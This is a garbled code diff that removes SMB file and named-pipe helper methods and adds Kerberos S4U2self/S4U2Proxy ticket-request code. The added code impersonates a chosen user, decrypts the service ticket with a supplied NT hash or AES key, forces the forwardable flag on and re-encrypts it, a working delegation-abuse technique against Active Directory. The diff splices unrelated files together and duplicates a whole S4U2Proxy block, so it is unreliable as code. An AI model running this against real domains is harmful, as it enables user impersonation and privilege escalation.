-            return self._SMBConnection.writeFile(treeId, fileId, data, offset)
-        except (smb.SessionError, smb3.SessionError) as e:
-            raise SessionError(e.get_error_code(), e.get_error_packet())
-
-    def readFile(self, treeId, fileId, offset = 0, bytesToRead = None, singleCall = True):
-        """
-        reads data from a file
-
-        :param HANDLE treeId: a valid handle for the share where the file is to be read
-        :param HANDLE fileId: a valid handle for the file to be read
-        :param integer offset: offset where to start reading the data
-        :param integer bytesToRead: amount of bytes to attempt reading. If None, it will attempt to read Dialect['MaxBufferSize'] bytes.
-        :param boolean singleCall: If True it won't attempt to read all bytesToRead. It will only make a single read call
-
-        :return: the data read. Length of data read is not always bytesToRead
-        :raise SessionError: if error
-        """
-        finished = False
-        data = b''
-        maxReadSize = self._SMBConnection.getIOCapabilities()['MaxReadSize']
-        if bytesToRead is None:
-            bytesToRead = maxReadSize
-        remainingBytesToRead = bytesToRead
-        while not finished:
-            if remainingBytesToRead > maxReadSize:
-                toRead = maxReadSize
-            else:
-                toRead = remainingBytesToRead
-            try:
-                bytesRead = self._SMBConnection.read_andx(treeId, fileId, offset, toRead)
-            except (smb.SessionError, smb3.SessionError) as e:
-                if e.get_error_code() == nt_errors.STATUS_END_OF_FILE:
-                    toRead = b''
-                    break
+                # Check which cipher was used to encrypt the ticket. It's not always the same
+                # This determines which of our keys we should use for decryption/re-encryption
+                newCipher = _enctype_table[int(tgs['ticket']['enc-part']['etype'])]
+                if newCipher.enctype == Enctype.RC4:
+                    key = Key(newCipher.enctype, nthash)
                 else:
-                    raise SessionError(e.get_error_code(), e.get_error_packet())
+                    key = Key(newCipher.enctype, aesKey)
 
-            data += bytesRead
-            if len(data) >= bytesToRead:
-                finished = True
-            elif len(bytesRead) == 0:
-                # End of the file achieved.
-                finished = True
-            elif singleCall is True:
-                finished = True
+                # Decrypt and decode the ticket
+                # Key Usage 2
+                # AS-REP Ticket and TGS-REP Ticket (includes tgs session key or
+                #  application session key), encrypted with the service key
+                #  (section 5.4.2)
+                plainText = newCipher.decrypt(key, 2, cipherText)
+                encTicketPart = decoder.decode(plainText, asn1Spec=EncTicketPart())[0]
+
+                # Print the flags in the ticket before modification
+                logging.debug('\tService ticket from S4U2self flags: ' + str(encTicketPart['flags']))
+                logging.debug('\tService ticket from S4U2self is'
+                              + ('' if (encTicketPart['flags'][TicketFlags.forwardable.value] == 1) else ' not')
+                              + ' forwardable')
+
+                # Customize flags the forwardable flag is the only one that really matters
+                logging.info('\tForcing the service ticket to be forwardable')
+                # convert to string of bits
+                flagBits = encTicketPart['flags'].asBinary()
+                # Set the forwardable flag. Awkward binary string insertion
+                flagBits = flagBits[:TicketFlags.forwardable.value] + '1' + flagBits[TicketFlags.forwardable.value + 1:]
+                # Overwrite the value with the new bits
+                encTicketPart['flags'] = encTicketPart['flags'].clone(value=flagBits)  # Update flags
+
+                logging.debug('\tService ticket flags after modification: ' + str(encTicketPart['flags']))
+                logging.debug('\tService ticket now is'
+                              + ('' if (encTicketPart['flags'][TicketFlags.forwardable.value] == 1) else ' not')
+                              + ' forwardable')
+
+                # Re-encode and re-encrypt the ticket
+                # Again, Key Usage 2
+                encodedEncTicketPart = encoder.encode(encTicketPart)
+                cipherText = newCipher.encrypt(key, 2, encodedEncTicketPart, None)
+
+                # put it back in the TGS
+                tgs['ticket']['enc-part']['cipher'] = cipherText
+
+            ################################################################################
+            # Up until here was all the S4USelf stuff. Now let's start with S4U2Proxy
+            # So here I have a ST for me.. I now want a ST for another service
+            # Extract the ticket from the TGT
+            ticketTGT = Ticket()
+            ticketTGT.from_asn1(decodedTGT['ticket'])
+
+            # Get the service ticket
+            ticket = Ticket()
+            ticket.from_asn1(tgs['ticket'])
+
+            apReq = AP_REQ()
+            apReq['pvno'] = 5
+            apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
+
+            opts = list()
+            apReq['ap-options'] = constants.encodeFlags(opts)
+            seq_set(apReq, 'ticket', ticketTGT.to_asn1)
+
+            authenticator = Authenticator()
+            authenticator['authenticator-vno'] = 5
+            authenticator['crealm'] = str(decodedTGT['crealm'])
+
+            clientName = Principal()
+            clientName.from_asn1(decodedTGT, 'crealm', 'cname')
+
+            seq_set(authenticator, 'cname', clientName.components_to_asn1)
+
+            now = datetime.datetime.utcnow()
+            authenticator['cusec'] = now.microsecond
+            authenticator['ctime'] = KerberosTime.to_asn1(now)
+
+            encodedAuthenticator = encoder.encode(authenticator)
+
+            # Key Usage 7
+            # TGS-REQ PA-TGS-REQ padata AP-REQ Authenticator (includes
+            # TGS authenticator subkey), encrypted with the TGS session
+            # key (Section 5.5.1)
+            encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)
+
+            apReq['authenticator'] = noValue
+            apReq['authenticator']['etype'] = cipher.enctype
+            apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
+
+            encodedApReq = encoder.encode(apReq)
+
+            tgsReq = TGS_REQ()
+
+            tgsReq['pvno'] = 5
+            tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
+            tgsReq['padata'] = noValue
+            tgsReq['padata'][0] = noValue
+            tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
+            tgsReq['padata'][0]['padata-value'] = encodedApReq
+
+            # Add resource-based constrained delegation support
+            paPacOptions = PA_PAC_OPTIONS()
+            paPacOptions['flags'] = constants.encodeFlags((constants.PAPacOptions.resource_based_constrained_delegation.value,))
+
+            tgsReq['padata'][1] = noValue
+            tgsReq['padata'][1]['padata-type'] = constants.PreAuthenticationDataTypes.PA_PAC_OPTIONS.value
+            tgsReq['padata'][1]['padata-value'] = encoder.encode(paPacOptions)
+
+            reqBody = seq_set(tgsReq, 'req-body')
+
+            opts = list()
+            # This specified we're doing S4U
+            opts.append(constants.KDCOptions.cname_in_addl_tkt.value)
+            opts.append(constants.KDCOptions.canonicalize.value)
+            opts.append(constants.KDCOptions.forwardable.value)
+            opts.append(constants.KDCOptions.renewable.value)
+
+            reqBody['kdc-options'] = constants.encodeFlags(opts)
+            service2 = Principal(self.__options.spn, type=constants.PrincipalNameType.NT_SRV_INST.value)
+            seq_set(reqBody, 'sname', service2.components_to_asn1)
+            reqBody['realm'] = self.__domain
+
+            myTicket = ticket.to_asn1(TicketAsn1())
+            seq_set_iter(reqBody, 'additional-tickets', (myTicket,))
+
+            now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
+
+            reqBody['till'] = KerberosTime.to_asn1(now)
+            reqBody['nonce'] = random.getrandbits(31)
+            seq_set_iter(reqBody, 'etype',
+                         (
+                             int(constants.EncryptionTypes.rc4_hmac.value),
+                             int(constants.EncryptionTypes.des3_cbc_sha1_kd.value),
+                             int(constants.EncryptionTypes.des_cbc_md5.value),
+                             int(cipher.enctype)
+                         )
+                         )
+            message = encoder.encode(tgsReq)
+
+            logging.info('\tRequesting S4U2Proxy')
+            r = sendReceive(message, self.__domain, kdcHost)
+
+            tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
+
+            cipherText = tgs['enc-part']['cipher']
+
+            # Key Usage 8
+            # TGS-REP encrypted part (includes application session
+            # key), encrypted with the TGS session key (Section 5.4.2)
+            plainText = cipher.decrypt(sessionKey, 8, cipherText)
+
+            encTGSRepPart = decoder.decode(plainText, asn1Spec=EncTGSRepPart())[0]
+
+            newSessionKey = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
+
+            # Creating new cipher based on received keytype
+            cipher = _enctype_table[encTGSRepPart['key']['keytype']]
+
+            return r, cipher, sessionKey, newSessionKey
+
+    def doS4U(self, tgt, cipher, oldSessionKey, sessionKey, nthash, aesKey, kdcHost):
+        decodedTGT = decoder.decode(tgt, asn1Spec=AS_REP())[0]
+        # Extract the ticket from the TGT
+        ticket = Ticket()
+        ticket.from_asn1(decodedTGT['ticket'])
+
+        apReq = AP_REQ()
+        apReq['pvno'] = 5
+        apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
+
+        opts = list()
+        apReq['ap-options'] = constants.encodeFlags(opts)
+        seq_set(apReq, 'ticket', ticket.to_asn1)
+
+        authenticator = Authenticator()
+        authenticator['authenticator-vno'] = 5
+        authenticator['crealm'] = str(decodedTGT['crealm'])
+
+        clientName = Principal()
+        clientName.from_asn1(decodedTGT, 'crealm', 'cname')
+
+        seq_set(authenticator, 'cname', clientName.components_to_asn1)
+
+        now = datetime.datetime.utcnow()
+        authenticator['cusec'] = now.microsecond
+        authenticator['ctime'] = KerberosTime.to_asn1(now)
+
+        if logging.getLogger().level == logging.DEBUG:
+            logging.debug('AUTHENTICATOR')
+            print(authenticator.prettyPrint())
+            print('\n')
+
+        encodedAuthenticator = encoder.encode(authenticator)
+
+        # Key Usage 7
+        # TGS-REQ PA-TGS-REQ padata AP-REQ Authenticator (includes
+        # TGS authenticator subkey), encrypted with the TGS session
+        # key (Section 5.5.1)
+        encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)
+
+        apReq['authenticator'] = noValue
+        apReq['authenticator']['etype'] = cipher.enctype
+        apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
+
+        encodedApReq = encoder.encode(apReq)
+
+        tgsReq = TGS_REQ()
+
+        tgsReq['pvno'] = 5
+        tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
+
+        tgsReq['padata'] = noValue
+        tgsReq['padata'][0] = noValue
+        tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
+        tgsReq['padata'][0]['padata-value'] = encodedApReq
+
+        # In the S4U2self KRB_TGS_REQ/KRB_TGS_REP protocol extension, a service
+        # requests a service ticket to itself on behalf of a user. The user is
+        # identified to the KDC by the user's name and realm.
+        clientName = Principal(self.__options.impersonate, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
+
+        S4UByteArray = struct.pack('<I', constants.PrincipalNameType.NT_PRINCIPAL.value)
+        S4UByteArray += b(self.__options.impersonate) + b(self.__domain) + b'Kerberos'
+
+        if logging.getLogger().level == logging.DEBUG:
+            logging.debug('S4UByteArray')
+            hexdump(S4UByteArray)
+
+        # Finally cksum is computed by calling the KERB_CHECKSUM_HMAC_MD5 hash
+        # with the following three parameters: the session key of the TGT of
+        # the service performing the S4U2Self request, the message type value
+        # of 17, and the byte array S4UByteArray.
+        checkSum = _HMACMD5.checksum(sessionKey, 17, S4UByteArray)
+
+        if logging.getLogger().level == logging.DEBUG:
+            logging.debug('CheckSum')
+            hexdump(checkSum)
+
+        paForUserEnc = PA_FOR_USER_ENC()
+        seq_set(paForUserEnc, 'userName', clientName.components_to_asn1)
+        paForUserEnc['userRealm'] = self.__domain
+        paForUserEnc['cksum'] = noValue
+        paForUserEnc['cksum']['cksumtype'] = int(constants.ChecksumTypes.hmac_md5.value)
+        paForUserEnc['cksum']['checksum'] = checkSum
+        paForUserEnc['auth-package'] = 'Kerberos'
+
+        if logging.getLogger().level == logging.DEBUG:
+            logging.debug('PA_FOR_USER_ENC')
+            print(paForUserEnc.prettyPrint())
+
+        encodedPaForUserEnc = encoder.encode(paForUserEnc)
+
+        tgsReq['padata'][1] = noValue
+        tgsReq['padata'][1]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_FOR_USER.value)
+        tgsReq['padata'][1]['padata-value'] = encodedPaForUserEnc
+
+        reqBody = seq_set(tgsReq, 'req-body')
+
+        opts = list()
+        opts.append(constants.KDCOptions.forwardable.value)
+        opts.append(constants.KDCOptions.renewable.value)
+        opts.append(constants.KDCOptions.canonicalize.value)
+
+        reqBody['kdc-options'] = constants.encodeFlags(opts)
+
+        serverName = Principal(self.__user, type=constants.PrincipalNameType.NT_UNKNOWN.value)
+        seq_set(reqBody, 'sname', serverName.components_to_asn1)
+        reqBody['realm'] = str(decodedTGT['crealm'])
+
+        now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
+
+        reqBody['till'] = KerberosTime.to_asn1(now)
+        reqBody['nonce'] = random.getrandbits(31)
+        seq_set_iter(reqBody, 'etype',
+                     (int(cipher.enctype), int(constants.EncryptionTypes.rc4_hmac.value)))
+
+        if logging.getLogger().level == logging.DEBUG:
+            logging.debug('Final TGS')
+            print(tgsReq.prettyPrint())
+
+        logging.info('\tRequesting S4U2self')
+        message = encoder.encode(tgsReq)
+
+        r = sendReceive(message, self.__domain, kdcHost)
+        if self.__no_s4u2proxy:
+            return r, cipher, sessionKey, sessionKey
+        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
+
+        if logging.getLogger().level == logging.DEBUG:
+            logging.debug('TGS_REP')
+            print(tgs.prettyPrint())
+
+        if self.__force_forwardable:
+            # Convert hashes to binary form, just in case we're receiving strings
+            if isinstance(nthash, str):
+                try:
+                    nthash = unhexlify(nthash)
+                except TypeError:
+                    pass
+            if isinstance(aesKey, str):
+                try:
+                    aesKey = unhexlify(aesKey)
+                except TypeError:
+                    pass
+
+            # Compute NTHash and AESKey if they're not provided in arguments
+            if self.__password != '' and self.__domain != '' and self.__user != '':
+                if not nthash:
+                    nthash = compute_nthash(self.__password)
+                    if logging.getLogger().level == logging.DEBUG:
+                        logging.debug('NTHash')
+                        print(hexlify(nthash).decode())
+                if not aesKey:
+                    salt = self.__domain.upper() + self.__user
+                    aesKey = _AES256CTS.string_to_key(self.__password, salt, params=None).contents
+                    if logging.getLogger().level == logging.DEBUG:
+                        logging.debug('AESKey')
+                        print(hexlify(aesKey).decode())
+
+            # Get the encrypted ticket returned in the TGS. It's encrypted with one of our keys
+            cipherText = tgs['ticket']['enc-part']['cipher']
+
+            # Check which cipher was used to encrypt the ticket. It's not always the same
+            # This determines which of our keys we should use for decryption/re-encryption
+            newCipher = _enctype_table[int(tgs['ticket']['enc-part']['etype'])]
+            if newCipher.enctype == Enctype.RC4:
+                key = Key(newCipher.enctype, nthash)
             else:
-                offset += len(bytesRead)
-                remainingBytesToRead -= len(bytesRead)
+                key = Key(newCipher.enctype, aesKey)
 
-        return data
+            # Decrypt and decode the ticket
+            # Key Usage 2
+            # AS-REP Ticket and TGS-REP Ticket (includes tgs session key or
+            #  application session key), encrypted with the service key
+            #  (section 5.4.2)
+            plainText = newCipher.decrypt(key, 2, cipherText)
+            encTicketPart = decoder.decode(plainText, asn1Spec=EncTicketPart())[0]
 
-    def closeFile(self, treeId, fileId):
-        """
-        closes a file handle
+            # Print the flags in the ticket before modification
+            logging.debug('\tService ticket from S4U2self flags: ' + str(encTicketPart['flags']))
+            logging.debug('\tService ticket from S4U2self is'
+                          + ('' if (encTicketPart['flags'][TicketFlags.forwardable.value] == 1) else ' not')
+                          + ' forwardable')
 
-        :param HANDLE treeId: a valid handle for the share where the file is to be opened
-        :param HANDLE fileId: a valid handle for the file/directory to be closed
+            # Customize flags the forwardable flag is the only one that really matters
+            logging.info('\tForcing the service ticket to be forwardable')
+            # convert to string of bits
+            flagBits = encTicketPart['flags'].asBinary()
+            # Set the forwardable flag. Awkward binary string insertion
+            flagBits = flagBits[:TicketFlags.forwardable.value] + '1' + flagBits[TicketFlags.forwardable.value + 1:]
+            # Overwrite the value with the new bits
+            encTicketPart['flags'] = encTicketPart['flags'].clone(value=flagBits)  # Update flags
 
-        :return: None
-        :raise SessionError: if error
-        """
+            logging.debug('\tService ticket flags after modification: ' + str(encTicketPart['flags']))
+            logging.debug('\tService ticket now is'
+                          + ('' if (encTicketPart['flags'][TicketFlags.forwardable.value] == 1) else ' not')
+                          + ' forwardable')
+
+            # Re-encode and re-encrypt the ticket
+            # Again, Key Usage 2
+            encodedEncTicketPart = encoder.encode(encTicketPart)
+            cipherText = newCipher.encrypt(key, 2, encodedEncTicketPart, None)
+
+            # put it back in the TGS
+            tgs['ticket']['enc-part']['cipher'] = cipherText
+
+        ################################################################################
+        # Up until here was all the S4USelf stuff. Now let's start with S4U2Proxy
+        # So here I have a ST for me.. I now want a ST for another service
+        # Extract the ticket from the TGT
+        ticketTGT = Ticket()
+        ticketTGT.from_asn1(decodedTGT['ticket'])
+
+        # Get the service ticket
+        ticket = Ticket()
+        ticket.from_asn1(tgs['ticket'])
+
+        apReq = AP_REQ()
+        apReq['pvno'] = 5
+        apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value)
+
+        opts = list()
+        apReq['ap-options'] = constants.encodeFlags(opts)
+        seq_set(apReq, 'ticket', ticketTGT.to_asn1)
+
+        authenticator = Authenticator()
+        authenticator['authenticator-vno'] = 5
+        authenticator['crealm'] = str(decodedTGT['crealm'])
+
+        clientName = Principal()
+        clientName.from_asn1(decodedTGT, 'crealm', 'cname')
+
+        seq_set(authenticator, 'cname', clientName.components_to_asn1)
+
+        now = datetime.datetime.utcnow()
+        authenticator['cusec'] = now.microsecond
+        authenticator['ctime'] = KerberosTime.to_asn1(now)
+
+        encodedAuthenticator = encoder.encode(authenticator)
+
+        # Key Usage 7
+        # TGS-REQ PA-TGS-REQ padata AP-REQ Authenticator (includes
+        # TGS authenticator subkey), encrypted with the TGS session
+        # key (Section 5.5.1)
+        encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 7, encodedAuthenticator, None)
+
+        apReq['authenticator'] = noValue
+        apReq['authenticator']['etype'] = cipher.enctype
+        apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator
+
+        encodedApReq = encoder.encode(apReq)
+
+        tgsReq = TGS_REQ()
+
+        tgsReq['pvno'] = 5
+        tgsReq['msg-type'] = int(constants.ApplicationTagNumbers.TGS_REQ.value)
+        tgsReq['padata'] = noValue
+        tgsReq['padata'][0] = noValue
+        tgsReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_TGS_REQ.value)
+        tgsReq['padata'][0]['padata-value'] = encodedApReq
+
+        # Add resource-based constrained delegation support
+        paPacOptions = PA_PAC_OPTIONS()
+        paPacOptions['flags'] = constants.encodeFlags((constants.PAPacOptions.resource_based_constrained_delegation.value,))
+
+        tgsReq['padata'][1] = noValue
+        tgsReq['padata'][1]['padata-type'] = constants.PreAuthenticationDataTypes.PA_PAC_OPTIONS.value
+        tgsReq['padata'][1]['padata-value'] = encoder.encode(paPacOptions)
+
+        reqBody = seq_set(tgsReq, 'req-body')
+
+        opts = list()
+        # This specified we're doing S4U
+        opts.append(constants.KDCOptions.cname_in_addl_tkt.value)
+        opts.append(constants.KDCOptions.canonicalize.value)
+        opts.append(constants.KDCOptions.forwardable.value)
+        opts.append(constants.KDCOptions.renewable.value)
+
+        reqBody['kdc-options'] = constants.encodeFlags(opts)
+        service2 = Principal(self.__options.spn, type=constants.PrincipalNameType.NT_SRV_INST.value)
+        seq_set(reqBody, 'sname', service2.components_to_asn1)
+        reqBody['realm'] = self.__domain
+
+        myTicket = ticket.to_asn1(TicketAsn1())
+        seq_set_iter(reqBody, 'additional-tickets', (myTicket,))
+
+        now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
+
+        reqBody['till'] = KerberosTime.to_asn1(now)
+        reqBody['nonce'] = random.getrandbits(31)
+        seq_set_iter(reqBody, 'etype',
+                     (
+                         int(constants.EncryptionTypes.rc4_hmac.value),
+                         int(constants.EncryptionTypes.des3_cbc_sha1_kd.value),
+                         int(constants.EncryptionTypes.des_cbc_md5.value),
+                         int(cipher.enctype)
+                     )
+                     )
+        message = encoder.encode(tgsReq)
+
+        logging.info('\tRequesting S4U2Proxy')
+        r = sendReceive(message, self.__domain, kdcHost)
+
+        tgs = decoder.decode(r, asn1Spec=TGS_REP())[0]
+
+        cipherText = tgs['enc-part']['cipher']
+
+        # Key Usage 8
+        # TGS-REP encrypted part (includes application session
+        # key), encrypted with the TGS session key (Section 5.4.2)
+        plainText = cipher.decrypt(sessionKey, 8, cipherText)
+
+        encTGSRepPart = decoder.decode(plainText, asn1Spec=EncTGSRepPart())[0]
+
+        newSessionKey = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
+
+        # Creating new cipher based on received keytype
+        cipher = _enctype_table[encTGSRepPart['key']['keytype']]
+
+        return r, cipher, sessionKey, newSessionKey
+
+    def run(self):
+
+        # Do we have a TGT cached?
+        tgt = None
         try:
-            return self._SMBConnection.close(treeId, fileId)
-        except (smb.SessionError, smb3.SessionError) as e:
-            raise SessionError(e.get_error_code(), e.get_error_packet())
-
-    def deleteFile(self, shareName, pathName):
-        """
-        removes a file
-
-        :param string shareName: a valid name for the share where the file is to be deleted
-        :param string pathName: the path name to remove
-
-        :return: None
-        :raise SessionError: if error
-        """
-        try:
-            return self._SMBConnection.remove(shareName, pathName)
-        except (smb.SessionError, smb3.SessionError) as e:
-            raise SessionError(e.get_error_code(), e.get_error_packet())
-
-    def queryInfo(self, treeId, fileId):
-        """
-        queries basic information about an opened file/directory
-
-        :param HANDLE treeId: a valid handle for the share where the file is to be queried
-        :param HANDLE fileId: a valid handle for the file/directory to be queried
-
-        :return: a smb.SMBQueryFileStandardInfo structure.
-        :raise SessionError: if error
-        """
-        try:
-            if self.getDialect() == smb.SMB_DIALECT:
-                res = self._SMBConnection.query_file_info(treeId, fileId)
+            ccache = CCache.loadFile(os.getenv('KRB5CCNAME'))
+            #ccache = CCache.loadFile(r'C:\Users\x\WIn-PADVTVG8OT8.ccache')
+            logging.debug("Using Kerberos Cache: %s" % os.getenv('KRB5CCNAME'))
+            principal = 'krbtgt/%s@%s' % (self.__domain.upper(), self.__domain.upper())
+            creds = ccache.getCredential(principal)
+            if creds is not None:
+                # ToDo: Check this TGT belogns to the right principal
+                TGT = creds.toTGT()
+                tgt, cipher, sessionKey = TGT['KDC_REP'], TGT['cipher'], TGT['sessionKey']
+                oldSessionKey = sessionKey
+                logging.info('Using TGT from cache')
             else:
-                res = self._SMBConnection.queryInfo(treeId, fileId)
-            return smb.SMBQueryFileStandardInfo(res)
-        except (smb.SessionError, smb3.SessionError) as e:
-            raise SessionError(e.get_error_code(), e.get_error_packet())
-
-    def createDirectory(self, shareName, pathName ):
-        """
-        creates a directory
-
-        :param string shareName: a valid name for the share where the directory is to be created
-        :param string pathName: the path name or the directory to create
-
-        :return: None
-        :raise SessionError: if error
-        """
-        try:
-            return self._SMBConnection.mkdir(shareName, pathName)
-        except (smb.SessionError, smb3.SessionError) as e:
-            raise SessionError(e.get_error_code(), e.get_error_packet())
-
-    def deleteDirectory(self, shareName, pathName):
-        """
-        deletes a directory
-
-        :param string shareName: a valid name for the share where directory is to be deleted
-        :param string pathName: the path name or the directory to delete
-
-        :return: None
-        :raise SessionError: if error
-        """
-        try:
-            return self._SMBConnection.rmdir(shareName, pathName)
-        except (smb.SessionError, smb3.SessionError) as e:
-            raise SessionError(e.get_error_code(), e.get_error_packet())
-
-    def waitNamedPipe(self, treeId, pipeName, timeout = 5):
-        """
-        waits for a named pipe
-
-        :param HANDLE treeId: a valid handle for the share where the pipe is
-        :param string pipeName: the pipe name to check
-        :param integer timeout: time to wait for an answer
-
-        :return: None
-        :raise SessionError: if error
-        """
-        try:
-            return self._SMBConnection.waitNamedPipe(treeId, pipeName, timeout = timeout)
-        except (smb.SessionError, smb3.SessionError) as e:
-            raise SessionError(e.get_error_code(), e.get_error_packet())
-
-    def transactNamedPipe(self, treeId, fileId, data, waitAnswer = True):
-        """
-        writes to a named pipe using a transaction command
-
-        :param HANDLE treeId: a valid handle for the share where the pipe is
-        :param HANDLE fileId: a valid handle for the pipe
-        :param string data: buffer with the data to write
-        :param boolean waitAnswer: whether or not to wait for an answer
-
-        :return: None
-        :raise SessionError: if error
-        """
-        try:
-            return self._SMBConnection.TransactNamedPipe(treeId, fileId, data, waitAnswer = waitAnswer)
-        except (smb.SessionError, smb3.SessionError) as e:
-            raise SessionError(e.get_error_code(), e.get_error_packet())
-
-    def transactNamedPipeRecv(self):
-        """
-        reads from a named pipe using a transaction command
-
-        :return: data read
-        :raise SessionError: if error
-        """
-        try:
-            return self._SMBConnection.TransactNamedPipeRecv()
-        except (smb.SessionError, smb3.SessionError) as e:
-            raise SessionError(e.get_error_code(), e.get_error_packet())
-
-    def writeNamedPipe(self, treeId, fileId, data, waitAnswer = True):
-        """
-        writes to a named pipe
-
-        :param HANDLE treeId: a valid handle for the share where the pipe is
-        :param HANDLE fileId: a valid handle for the pipe
-        :param string data: buffer with the data to write
-        :param boolean waitAnswer: whether or not to wait for an answer
-
-        :return: None
-        :raise SessionError: if error
-        """
-        try:
-            if self.getDialect() == smb.SMB_DIALECT:
-                return self._SMBConnection.write_andx(treeId, fileId, data, wait_answer = waitAnswer, write_pipe_mode = True)
-            else:
-                return self.writeFile(treeId, fileId, data, 0)
-        except (smb.SessionError, smb3.SessionError) as e:
-            raise SessionError(e.get_error_code(), e.get_error_packet())
-
-    def readNamedPipe(self,treeId, fileId, bytesToRead = None ):
-        """
-        read from a named pipe
-
-        :param HANDLE treeId: a valid handle for the share where the pipe resides
-        :param HANDLE fileId: a valid handle for the pipe
-        :param integer bytesToRead: amount of data to read
-
-        :return: None
-        :raise SessionError: if error
-        """
-
-        try:
-            return self.readFile(treeId, fileId, bytesToRead = bytesToRead, singleCall = True)
-        except (smb.SessionError, smb3.SessionError) as e:
-            raise SessionError(e.get_error_code(), e.get_error_packet())
-
-
-    def getFile(self, shareName, pathName, callback, shareAccessMode = None):
-        """
-        downloads a file
-
-        :param string shareName: name for the share where the file is to be retrieved
-        :param string pathName: the path name to retrieve
-        :param callback callback: function called to write the contents read.
-        :param int shareAccessMode:
-
-        :return: None
-        :raise SessionError: if error
-        """
-        try:
-            if shareAccessMode is None:
-                # if share access mode is none, let's the underlying API deals with it
-                return self._SMBConnection.retr_file(shareName, pathName, callback)
-            else:
-                return self._SMBConnection.retr_file(shareName, pathName, callback, shareAccessMode=shareAccessMode)
-        except (smb.SessionError, smb3.SessionError) as e:
-            raise SessionError(e.get_error_code(), e.get_error_packet())
-
-    def putFile(self, shareName, pathName, callback, shareAccessMode = None):
-        """
-        uploads a file
-
-        :param string shareName: name for the share where the file is to be uploaded
-        :param string pathName: the path name to upload
-        :param callback callback: function called to read the contents to be written.
-        :param int shareAccessMode:
-
-        :return: None
-        :raise SessionError: if error
-        """
-        try:
-            if shareAccessMode is None:
-                # if share access mode is none, let's the underlying API deals with it
-                return self._SMBConnection.stor_file(shareName, pathName, callback)
-            else:
-                return self._SMBConnection.stor_file(shareName, pathName, callback, shareAccessMode)
-        except (smb.SessionError, smb3.SessionError) as e:
-            raise SessionError(e.get_error_code(), e.get_error_packet())
-
-    def listSnapshots(self, tid, path):
-        """
-        lists the snapshots for the given directory
-
-        :param int tid: tree id of current connection
-        :param string path: directory to list the snapshots of
-
-        :raise SessionError: if error
-        """
-
-        # Verify we're under SMB2+ session
-        if self.getDialect() not in [SMB2_DIALECT_002, SMB2_DIALECT_21, SMB2_DIALECT_30]:
-            raise SessionError(error = nt_errors.STATUS_NOT_SUPPORTED)
-
-        fid = self.openFile(tid, path, FILE_READ_DATA | FILE_READ_EA | FILE_READ_ATTRIBUTES | READ_CONTROL | SYNCHRONIZE,
-                            fileAttributes=None, creationOption=FILE_SYNCHRONOUS_IO_NONALERT,
-                            shareMode=FILE_SHARE_READ | FILE_SHARE_WRITE)
-
-        # first send with maxOutputResponse=16 to get the required size
-        try:
-            snapshotData = SRV_SNAPSHOT_ARRAY(self._SMBConnection.ioctl(tid, fid, FSCTL_SRV_ENUMERATE_SNAPSHOTS,
-                                  flags=SMB2_0_IOCTL_IS_FSCTL, maxOutputResponse=16))
-        except (smb.SessionError, smb3.SessionError) as e:
-            self.closeFile(tid, fid)
-            raise SessionError(e.get_error_code(), e.get_error_packet())
-
-        if snapshotData['SnapShotArraySize'] >= 52:
-            # now send an appropriate sized buffer
-            try:
-               snapshotData = SRV_SNAPSHOT_ARRAY(self._SMBConnection.ioctl(tid, fid, FSCTL_SRV_ENUMERATE_SNAPSHOTS,
-                                  flags=SMB2_0_IOCTL_IS_FSCTL, maxOutputResponse=snapshotData['SnapShotArraySize']+12))
-            except (smb.SessionError, smb3.SessionError) as e:
-               self.closeFile(tid, fid)
-               raise SessionError(e.get_error_code(), e.get_error_packet())
-
-        self.closeFile(tid, fid)
-        return list(filter(None, snapshotData['SnapShots'].decode('utf16').split('\x00')))
-
-    def createMountPoint(self, tid, path, target):
-        """
-        creates a mount point at an existing directory
-
-        :param int tid: tree id of current connection
-        :param string path: directory at which to create mount point (must already exist)
-        :param string target: target address of mount point
-
-        :raise SessionError: if error
-        """
-
-        # Verify we're under SMB2+ session
-        if self.getDialect() not in [SMB2_DIALECT_002, SMB2_DIALECT_21, SMB2_DIALECT_30]:
-            raise SessionError(error = nt_errors.STATUS_NOT_SUPPORTED)
-
-        fid = self.openFile(tid, path, GENERIC_READ | GENERIC_WRITE,
-                            creationOption=FILE_OPEN_REPARSE_POINT)
-
-        if target.startswith("\\"):
-            fixed_name  = target.encode('utf-16le')
-        else:
-            fixed_name  = ("\\??\\" + target).encode('utf-16le')
-
-        name        = target.encode('utf-16le')
-
-        reparseData = MOUNT_POINT_REPARSE_DATA_STRUCTURE()
-
-        reparseData['PathBuffer']           = fixed_name + b"\x00\x00" + name + b"\x00\x00"
-        reparseData['SubstituteNameLength'] = len(fixed_name)
-        reparseData['PrintNameOffset']      = len(fixed_name) + 2
-        reparseData['PrintNameLength']      = len(name)
-
-        self._SMBConnection.ioctl(tid, fid, FSCTL_SET_REPARSE_POINT, flags=SMB2_0_IOCTL_IS_FSCTL,
-                                  inputBlob=reparseData)
-
-        self.closeFile(tid, fid)
-
-    def removeMountPoint(self, tid, path):
-        """
-        removes a mount point without deleting the underlying directory
-
-        :param int tid: tree id of current connection
-        :param string path: path to mount point to remove
-
-        :raise SessionError: if error
-        """
-
-        # Verify we're under SMB2+ session
